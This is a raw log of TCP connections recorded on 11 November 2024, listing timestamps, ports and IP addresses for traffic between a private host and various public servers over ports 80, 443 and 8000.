Nov 11, 2024 18:13:26.709227085 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.709290028 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.709295034 CET	443	63303	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:26.709449053 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.709449053 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.709469080 CET	63303	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.728569984 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:26.733338118 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.063139915 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.063539028 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.067162991 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.067223072 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.073899031 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.073935986 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.074136972 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.074429035 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.074440956 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.524559021 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.524734020 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.546391010 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.546416044 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.546715021 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:27.546767950 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.561691046 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:27.603341103 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:28.835561037 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:28.835611105 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:28.835638046 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.835648060 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:28.835664988 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.835711002 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.836188078 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.836222887 CET	443	63317	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:28.836370945 CET	63317	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.899952888 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:28.904824018 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:28.966795921 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:28.972366095 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:29.171669006 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:29.172224045 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:29.174089909 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:29.179130077 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:29.383472919 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:29.383529902 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:29.384396076 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:29.384447098 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:29.395273924 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:29.395308018 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:29.395370960 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:29.395601988 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:29.395617962 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:29.470797062 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:29.470866919 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:29.479676962 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:29.484536886 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:29.751168013 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:29.751221895 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:29.756979942 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:29.761807919 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:30.130561113 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:30.130670071 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:30.275463104 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:30.275485992 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:30.275779009 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:30.278675079 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:30.279305935 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:30.319338083 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:30.529803991 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:30.529870987 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:31.818814039 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818861961 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818887949 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818912029 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818923950 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.818945885 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818974018 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.818984985 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.818994045 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819000959 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.819031954 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.819041014 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819075108 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819081068 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.819183111 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819415092 CET	443	63420	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:31.819468975 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819509983 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.819540977 CET	63420	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.821046114 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:31.825848103 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.153229952 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.153310061 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.159029007 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.159076929 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.159151077 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.159465075 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.159476995 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.589342117 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.589478016 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.592402935 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.592415094 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.592679024 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:32.592727900 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.593564034 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:32.639333963 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478560925 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478605986 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478631020 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478662968 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478673935 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478693962 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478704929 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478720903 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478744030 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478746891 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478754044 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478769064 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478792906 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478797913 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478867054 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.478871107 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.478921890 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.480274916 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.480309010 CET	443	63440	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:35.480410099 CET	63440	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:35.530838013 CET	80	63298	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:35.530937910 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:36.042417049 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:36.047246933 CET	80	63471	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:36.047322035 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:36.047619104 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:36.052340031 CET	80	63471	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:36.125667095 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:36.130496025 CET	80	63472	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:36.130561113 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:36.130695105 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:36.135548115 CET	80	63472	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:36.170813084 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:36.175540924 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:36.456219912 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:36.456275940 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:36.603832006 CET	80	63471	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:36.603893995 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:36.667170048 CET	80	63471	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:36.667239904 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:36.687558889 CET	80	63472	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:36.688746929 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:36.751593113 CET	80	63472	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:36.751658916 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:37.013526917 CET	63471	80	192.168.2.6	103.224.212.210
Nov 11, 2024 18:13:37.013976097 CET	62050	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.014394999 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.018302917 CET	80	63471	103.224.212.210	192.168.2.6
Nov 11, 2024 18:13:37.019229889 CET	80	62050	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:37.019246101 CET	80	63478	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:37.019347906 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.019841909 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.025387049 CET	80	63478	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:37.077326059 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:37.078761101 CET	63472	80	192.168.2.6	103.224.182.252
Nov 11, 2024 18:13:37.083172083 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:37.084089994 CET	80	63472	103.224.182.252	192.168.2.6
Nov 11, 2024 18:13:37.295396090 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:37.296716928 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:37.297099113 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:37.297841072 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.299496889 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:37.300383091 CET	80	63480	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:37.300601959 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:37.301165104 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:37.301487923 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:37.301551104 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:37.301786900 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:37.302561998 CET	80	63482	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:37.302649021 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:37.302732944 CET	80	63483	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.302779913 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.302927971 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.303481102 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:37.304342985 CET	80	63484	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:37.304413080 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:37.306035042 CET	80	63480	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:37.306564093 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:37.307672024 CET	80	63483	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.308362961 CET	80	63482	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:37.362814903 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:13:37.366861105 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:13:37.435569048 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:37.440686941 CET	80	63484	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:37.445703983 CET	80	63478	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:37.445887089 CET	80	63478	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:37.445921898 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.446008921 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:37.481319904 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:37.486274958 CET	80	63485	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:37.487271070 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:37.488403082 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:37.493225098 CET	80	63485	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:37.727586031 CET	80	63480	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:37.729882956 CET	80	63483	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.730037928 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:37.730304956 CET	80	63482	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:37.730376005 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:37.730376959 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.735954046 CET	80	63480	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:37.736042023 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:37.737113953 CET	80	63483	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.737174988 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.738120079 CET	80	63482	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:37.738675117 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:37.778590918 CET	63483	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.783504009 CET	80	63483	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.891904116 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.891944885 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:37.892025948 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:37.917001009 CET	80	63485	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:37.917099953 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:37.923973083 CET	80	63485	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:37.924034119 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:38.055206060 CET	80	63484	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:38.055288076 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:38.226176977 CET	62052	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.226656914 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.230984926 CET	80	62052	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.231583118 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.232340097 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.232637882 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.237458944 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.289459944 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:38.289506912 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:38.289609909 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:38.343826056 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:38.343837023 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:38.344007969 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:38.344041109 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:38.731242895 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731271982 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731282949 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731292963 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731340885 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731381893 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.731399059 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731420994 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731436014 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731445074 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731446981 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.731456995 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.731481075 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.731513977 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.736226082 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.736279011 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.736291885 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.736303091 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.736362934 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.772458076 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:38.772566080 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:38.778858900 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:38.778948069 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:38.818166018 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818192959 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818208933 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818240881 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818239927 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.818253040 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818294048 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.818588972 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818603992 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818614960 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818628073 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818636894 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.818638086 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.818654060 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.818682909 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.819422960 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.819468021 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.819469929 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.819478989 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.819509029 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.819513083 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.819524050 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.819536924 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.819549084 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.819570065 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.820292950 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.820334911 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.820365906 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.820377111 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.820403099 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.820405960 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.820414066 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.820441008 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.820461988 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.821170092 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.821192980 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.821203947 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.821233988 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.821239948 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.821264029 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.821296930 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.877535105 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877563953 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877573967 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877644062 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.877646923 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877657890 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877670050 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877680063 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877687931 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.877690077 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877702951 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877716064 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.877726078 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.877762079 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.882539034 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.882563114 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.882574081 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.882630110 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.882630110 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.900187016 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.900245905 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.900527000 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:38.900572062 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:38.965913057 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966058016 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966133118 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966141939 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966151953 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966164112 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966175079 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966175079 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966207027 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966233969 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966623068 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966661930 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966677904 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966691971 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966703892 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966720104 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:38.966722012 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:38.966732979 CET	80	63492	64.190.63.136	192.168.2.6
